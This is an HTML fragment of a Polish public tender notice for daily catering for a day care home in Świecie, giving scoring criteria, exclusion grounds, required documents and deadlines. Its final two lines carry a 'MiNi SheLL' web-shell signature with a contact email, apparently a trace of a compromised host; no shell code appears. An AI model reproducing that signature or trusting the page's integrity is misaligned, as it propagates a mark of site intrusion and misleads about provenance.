2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami<br/>i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Znaczenie (%)<br/>1.<br/>Cena za 1 zestaw posiłków tj. wyżywienie dla 1 uczestnika Dziennego<br/>Domu Pomocy za 1 dzień obejmujące: śniadanie wraz z napojem oraz<br/>obiad składający się z I dania z pieczywem lub II dania wraz z napojem.<br/>60%<br/>2. Lokalizacja kuchni/obiektu względem Dziennego Domu Pomocy przy<br/>ul. Królowej Bony 2 w Świeciu 40%<br/>Razem 100%<br/>Kryterium „Cena” ocena zostanie dokonana w oparciu o informacje podane w formularzu<br/>ofertowym (Załącznik nr 1 do SWZ).<br/>Sposób obliczania wartości punktowej ocenianego kryterium:<br/>1) kryterium 1 - Cena za 1 zestaw posiłków tj. wyżywienie dla 1 uczestnika Dziennego Domu<br/>Pomocy za 1 dzień obejmujące: śniadanie wraz z napojem oraz obiad składający się z I dania<br/>z pieczywem lub II dania wraz z napojem.<br/>najniższa cena oferowana wśród<br/>wszystkich podlegających ocenie ofert<br/>Najniższa cena brutto = ------------------------------------------------------------------------------- x 60 pkt<br/>cena zaoferowana w badanej ofercie<br/>W kryterium nr 1 oferta może uzyskać maksymalnie 60 pkt<br/>2) kryterium 2 - Lokalizacja kuchni/obiektu względem Dziennego Domu Pomocy przy ul. Królowej<br/>Bony 2 w Świeciu<br/>W kryterium „Lokalizacja kuchni/obiektu względem Dziennego Domu Pomocy przy ul. Królowej<br/>Bony 2 w Świeciu” ocena zostanie dokonana w oparciu o informacje podane w formularzu<br/>ofertowym z dokładnością do dwóch cyfr po przecinku (Załącznik nr 1 do SWZ);<br/>Do 10 km – 40 pkt<br/>powyżej 10 km do 20 km – 30 pkt<br/>powyżej 20 km do 30 km – 20 pkt<br/>powyżej 30 km do 40 km – 10 pkt<br/>powyżej 40 km – 0 pkt<br/>W kryterium nr 2 oferta może uzyskać maksymalnie 40 pkt<br/>Podsumowanie kryteriów: 100% = 100 pkt; 1% = 1 pkt<br/>Oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów.<br/>2. Łączną ilość punktów (Lp.) przyznanych danej ofercie stanowić będzie suma punktów przyznanych<br/>w ramach poszczególnych kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Lokalizacja kuchni/obiektu względem Dziennego Domu Pomocy przy ul. Królowej Bony 2 w Świeciu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale VIII i IX SWZ oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Opis spełnienia warunku:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Opis spełnienia warunku:<br/>Wykonawca spełni warunek, jeżeli:<br/>posiada decyzję lub inne dokumenty Państwowego Powiatowego Inspektora Sanitarnego<br/>zatwierdzające zakład, podmiot, który produkuje lub wprowadza do obrotu żywność<br/>w zakresie przygotowywania posiłków od surowca do gotowej potrawy oraz rozprowadzania<br/>i świadczenia usług cateringowych, posiłków w rozumieniu ustawy z dnia 25 sierpnia 2006 r. o<br/>bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2023 r., poz. 1448);<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Opis spełnienia warunku:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Opis spełnienia warunku:<br/>Wykonawca spełni warunek, jeżeli: dysponuje odpowiednim potencjałem technicznym: Wykonawca<br/>powinien udokumentować dysponowanie minimum jednym środkiem transportu, spełniającym<br/>wymagania sanitarne na przewóz i dostawę posiłków cateringowych.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne<br/>spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (t.j. Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór<br/>oświadczenia stanowi załącznik Nr 5 do SWZ;<br/>4) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego<br/>na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>e) art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących płatności podatków<br/>i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach<br/>lokalnych (Dz. U. z 2023 r. poz. 70 z późn. zm.),<br/>f) art. 109 ust. 1 pkt. 5, 7, 8 i 10 ustawy Pzp zgodnie z załącznikiem nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Decyzję lub inne dokumenty Państwowego Powiatowego Inspektora Sanitarnego zatwierdzające<br/>zakład, podmiot, który produkuje lub wprowadza do obrotu żywność w zakresie przygotowywania<br/>posiłków od surowca do gotowej potrawy oraz rozprowadzania i świadczenia usług cateringowych<br/>posiłków w rozumieniu ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j.<br/>Dz. U. z 2023, poz. 1448);<br/>dysponuje odpowiednim potencjałem technicznym – Wykonawca powinien udokumentować<br/>dysponowanie minimum jednym środkiem transportu, spełniającym wymagania sanitarne na przewóz i dostawę posiłków cateringowych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.1. Do oferty do Formularza ofertowego – Załącznik Nr 1 do SWZ Wykonawca zobowiązany jest<br/>dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału<br/>w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem Nr 2 do SWZ.<br/>.2. Pełnomocnictwo (jeśli dotyczy)<br/>• gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca,<br/>który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument<br/>pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty<br/>i podpisania umowy,<br/>• w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia Wykonawcy są<br/>zobowiązani do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie<br/>wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>Wykonawców, należy załączyć do oferty.<br/>Wymagana forma:<br/>• oryginał w formie elektronicznej opatrzonej podpisem kwalifikowanym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę<br/>upoważnioną do reprezentowania Wykonawcy/Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia zgodnie z formą reprezentacji, określoną w dokumencie rejestrowym<br/>właściwym dla formy organizacyjnej, lub<br/>• elektroniczna kopia dokumentu w formie elektronicznego poświadczenia notarialnego, tj. poświadczenia opatrzonego przez notariusza kwalifikowanym podpisem elektronicznym.<br/>1.3. Zobowiązanie podmiotu trzeciego (jeśli dotyczy)<br/>Zobowiązanie podmiotu udostępniającego zasoby Załącznik Nr 4 do SWZ (lub inny podmiotowy<br/>środek dowodowy) jeżeli dotyczy, potwierdza, że stosunek łączący Wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa<br/>w szczególności:<br/>• zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>• sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>• czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>1.4. Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane<br/>w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, Wykonawca wraz<br/>z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępnione oraz wykazuje, że<br/>zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz.U. z 2022r. poz. 1233).<br/>1.5.Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeśli dotyczy) - Załącznik Nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być<br/>załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia,<br/>o których mowa w Rozdziale XII ust. 1 pkt 1.1 SWZ, składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy<br/>z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa<br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Zgodnie z art. 117 ust. 4 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia publicznego, w okolicznościach gdy Zamawiający określa warunki udziału<br/>w postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 Pzp lub warunki dotyczące wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zobowiązani są do dołączenia do oferty oświadczenia,<br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni Wykonawcy<br/>– Załącznik Nr 6 do SWZ.<br/>Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 Pzp dotyczy również Wykonawców prowadzących działalność w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanym w projektowanych<br/>postanowieniach umowy, stanowiących Załącznik Nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie pod adresem: https://platformazakupowa.pl/pn/ops_swiecie na stronie dotyczącej odpowiedniego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy przysługują środki ochrony prawnej zgodnie z ustawą Pzp. Środki ochrony prawnej zostały opisane w rozdziale XXXVII.<br/>Z postępowania wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2025 r. poz. 514).<br/>Zamawiający nie dokonuje podziału zamówienia na części. Tym samym Zamawiający nie dopuszcza składania ofert częściowych, o których mowa w art. 7 pkt 15 ustawy Pzp.<br/>Powody niedokonania podziału:<br/>Podzielenie na części nie jest możliwe ze względu na specyfikę zamówienia, gdyż stanowi całość. Podzielenie na części groziłoby trudnościami technicznymi i kosztami wykonania zamówienia, <br/>a także potrzebą skoordynowania działań różnych Wykonawców.<br/>Brak podziału zamówienia na części nie skutkuje brakiem możliwości złożenia oferty w niniejszym postepowaniu przez mikro, małe i średnie przedsiębiorstwa. Brak podziału zamówienia na części nie powoduje ograniczenia konkurencji oraz zapewnia równy dostęp podmiotów z sektora małych <br/>i średnich przedsiębiorstw. <br/>W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ, do oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy:<br/>• rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415 z późn. zm.),<br/>• rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania<br/>i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452)

Creat By MiNi SheLL
Email: jattceo@gmail.com